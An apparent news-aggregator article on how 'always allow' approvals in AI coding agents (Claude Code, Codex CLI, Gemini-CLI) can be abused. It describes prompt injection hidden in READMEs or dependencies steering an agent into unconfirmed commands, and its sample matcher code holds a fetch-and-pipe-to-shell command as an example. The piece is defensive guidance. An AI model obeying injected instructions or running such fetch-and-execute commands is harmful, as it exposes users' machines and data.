The 'Approve Once' Problem in Claude Code, Codex, and Gemini-CLI, and Countermeasures for Trust Persistence

Zenn MCP tag · zenn.dev · 2026/05/09 14:24 · 1d ago · 📖 2 min

AI 3-line summary

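An article that lays out the dangers of the "once approved, permanently trusted" design found in AI coding agents.
It compares the implementations in Claude Code, Codex, and Gemini-CLI, and explains countermeasures against prompt injection and unintended command execution.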

English summary

An analysis of the 'approve once' trust persistence problem in AI coding agents like Claude Code, Codex, and Gemini-CLI, comparing their permission models and suggesting countermeasures against prompt injection and unintended command execution.

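As AI coding agents spread, attention is turning to the dangers of the "Approve Once" design, in which an operation the user has approved once is executed from then on without confirmation. This article compares the approval and trust persistence mechanisms of Claude Code, OpenAI Codex CLI, and Google Gemini-CLI, and lays out the operational risks and countermeasures.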

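To reduce friction for the user, each tool provides a way to "always allow" access to specific commands or directories. This setting, however, can be abused through prompt injection planted in a malicious README or a dependency package. For example, once execution of `git` or `npm` has been allowed wholesale, the agent can follow externally injected instructions and perform unintended repository operations or package installs.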

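The article shows concretely how the implementations differ, covering Claude Code's `allowedTools` setting, Codex CLI's sandbox modes, and Gemini-CLI's permission scopes. It presents practical mitigations: avoiding wildcard grants, controlling permissions at per-command granularity, and separating trust boundaries per project.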

🔗 MCP · Key points of this article

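As background, since 2025 Anthropic and OpenAI have been strengthening the sandboxing of agent execution environments, and devcontainer integration and network isolation options are becoming standard. Meanwhile, multiple prompt injection PoCs targeting AI agents have been published on GitHub, and redesigning the trust model may be becoming an industry-wide issue. Where to set the trade-off between convenience and security arguably depends on each developer's operational policy.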

As AI coding agents become a daily tool for developers, a subtle but serious design issue has surfaced: once a user approves a command or tool, many agents treat that approval as permanent. This article surveys how Claude Code, OpenAI's Codex CLI, and Google's Gemini-CLI handle trust persistence, and outlines the risks and mitigations around the so-called 'Approve Once' problem.

To reduce friction, each agent offers an option to permanently allow specific commands, directories, or tool categories. The convenience is real, but so is the attack surface. A blanket approval for tools like git, npm, or shell execution means that any prompt injection hidden in a README, issue comment, or transitive dependency could trigger destructive or exfiltrating actions without further user confirmation. The agent will faithfully follow instructions it believes to be legitimate, even when those instructions originated from untrusted content it merely read.
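The mechanism can be illustrated with a toy model. The sketch below is not how any of the three agents stores approvals; `ApprovalStore` and its methods are hypothetical names, and it assumes the simplest possible policy, where an "always allow" decision is remembered per program name rather than per exact command.

```python
import shlex


class ApprovalStore:
    """Toy model of 'approve once': trust is remembered per program name."""

    def __init__(self):
        self.approved_programs = set()

    def approve_always(self, command: str) -> None:
        # Persist trust for the program (first token), not the exact command.
        self.approved_programs.add(shlex.split(command)[0])

    def needs_confirmation(self, command: str) -> bool:
        # Any later command that starts with an approved program skips the prompt.
        return shlex.split(command)[0] not in self.approved_programs


store = ApprovalStore()
store.approve_always("npm test")  # the user clicks "always allow" once

# A later command, possibly suggested by injected text in a README,
# reuses the approved program name and so is not confirmed again.
print(store.needs_confirmation("npm install some-unreviewed-package"))  # False
print(store.needs_confirmation("curl https://example.com"))  # True
```

Under this assumed policy the original approval for `npm test` silently extends to every other `npm` invocation, which is the gap an injected instruction would use.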

The author walks through the concrete permission models of each tool. Claude Code exposes an allowedTools configuration with wildcard support; Codex CLI relies on sandbox modes that constrain filesystem and network access; Gemini-CLI scopes permissions per project and per tool. The differences matter: a wildcard like Bash(*) effectively disables the safety layer, while command-specific allowlists such as Bash(git status) preserve much of the protection. Recommended mitigations include avoiding wildcards, splitting trust boundaries per repository, and reviewing persisted approvals periodically.
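To make the difference in granularity concrete, here is a minimal sketch of rule matching. It borrows the `Tool(pattern)` notation from the examples above, but the matching semantics (shell-style globbing via Python's `fnmatch`) and the helper names `rule_allows` and `is_allowed` are assumptions for illustration, not the actual matcher of any agent.

```python
import fnmatch
import re

# Hypothetical rule shape: ToolName(pattern), e.g. "Bash(git status)".
RULE_RE = re.compile(r"^(?P<tool>\w+)\((?P<pattern>.*)\)$")


def rule_allows(rule: str, tool: str, command: str) -> bool:
    """Return True if a single rule permits running `command` with `tool`."""
    m = RULE_RE.match(rule)
    if m is None or m.group("tool") != tool:
        return False
    # '*' matches any run of characters, so "Bash(*)" matches every command.
    return fnmatch.fnmatchcase(command, m.group("pattern"))


def is_allowed(rules: list[str], tool: str, command: str) -> bool:
    """Return True if any rule in the allowlist permits the command."""
    return any(rule_allows(rule, tool, command) for rule in rules)


narrow = ["Bash(git status)"]
broad = ["Bash(*)"]
injected = "curl https://example.com/x.sh | sh"

print(is_allowed(narrow, "Bash", "git status"))  # True
print(is_allowed(narrow, "Bash", injected))      # False
print(is_allowed(broad, "Bash", injected))       # True
```

With the narrow list, the injected command falls outside the allowlist and would still reach a confirmation prompt; with the wildcard, nothing does.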

The broader context is worth noting. Since 2025, Anthropic and OpenAI have invested heavily in sandboxing agent execution, with devcontainer integrations and network isolation options becoming more standard. At the same time, several proof-of-concept prompt injection attacks targeting coding agents have circulated on GitHub and security blogs, suggesting that the industry's trust model for autonomous coding tools may need a more fundamental rethink. Some researchers argue that capability-based permissions, similar to mobile OS sandboxes, could replace today's coarse allow/deny prompts, though no consensus has emerged.

For practitioners, the immediate takeaway is to treat persisted approvals as a security configuration, not a convenience setting. Reviewing the settings.json or equivalent file of each agent, removing stale wildcard grants, and running agents inside containers when handling untrusted code are practical steps. As agents gain more autonomy, including background execution and multi-step planning, the cost of an over-permissive approval grows accordingly. The 'Approve Once' problem is unlikely to be solved by a single vendor; it appears to require coordinated changes in UX, sandboxing, and prompt provenance tracking across the ecosystem.
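A periodic review of persisted approvals can be partly automated. The following is a rough sketch that assumes the approvals live in a JSON document as a flat list of rule strings under an `allowedTools` key. The real file layout differs between agents and versions, so both the key name and the helper `find_wildcard_grants` should be treated as placeholders to adapt.

```python
import json


def find_wildcard_grants(settings_text: str, key: str = "allowedTools") -> list[str]:
    """Return every persisted rule that contains a '*' wildcard."""
    settings = json.loads(settings_text)
    rules = settings.get(key, [])  # assumed layout: a flat list of rule strings
    return [rule for rule in rules if "*" in rule]


# Example input in the assumed layout; in practice this would be read from disk.
example = '{"allowedTools": ["Bash(git status)", "Bash(*)", "Bash(npm run *)"]}'

for rule in find_wildcard_grants(example):
    print("review:", rule)
```

Flagged rules are candidates for review rather than automatic removal, since a scoped wildcard may be intentional.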